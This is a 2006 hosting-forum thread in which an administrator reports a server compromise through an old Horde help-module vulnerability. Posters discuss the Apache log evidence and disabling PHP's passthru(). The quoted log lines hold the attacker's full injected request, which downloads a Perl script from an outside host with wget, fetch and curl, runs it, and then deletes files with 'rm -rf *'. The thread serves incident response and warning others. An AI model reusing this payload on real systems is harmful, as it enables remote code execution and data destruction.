The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security Update: HORDER Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster

    stugster Well-Known Member

    Joined:
    Apr 16, 2002
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    306
    Location:
    Edinburgh, UK
    cPanel Access Level:
    Root Administrator
    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
     
    #1 stugster, Sep 8, 2006
  2. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    166
    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
     
    #2 netlook, Sep 8, 2006
  3. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    166
    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde. Which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -

    [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     
    #3 randomuser, Sep 8, 2006
(You must log in or sign up to post here.)
Loading...
Similar Threads - Security Update HORDER
  1. NestMan

    Security Advisor says there are EasyApache updates?

    NestMan, Jun 24, 2016, in forum: EasyApache
    Replies:
    11
    Views:
    742
    Infopro
    Aug 16, 2016
  2. Droidism20011

    MySQL -> MariaDB security questions

    Droidism20011, Jul 20, 2017 at 2:21 PM, in forum: Security
    Replies:
    3
    Views:
    72
    Droidism20011
    Jul 24, 2017 at 3:16 AM
  3. zoner

    SecRemoteRules - ModSecurity Vendor

    zoner, Jul 19, 2017 at 12:34 PM, in forum: Security
    Replies:
    3
    Views:
    71
    zoner
    Jul 24, 2017 at 5:15 AM
  4. Trane Francks

    EasyApache 3 security release for PHP 5.6.31?

    Trane Francks, Jul 11, 2017, in forum: EasyApache
    Replies:
    9
    Views:
    160
    cPanelMichael
    Jul 13, 2017
  5. Kent Brockman

    Security Concerns

    Kent Brockman, Jul 5, 2017, in forum: Security
    Replies:
    4
    Views:
    100
    SoftDux
    Jul 10, 2017

Share This Page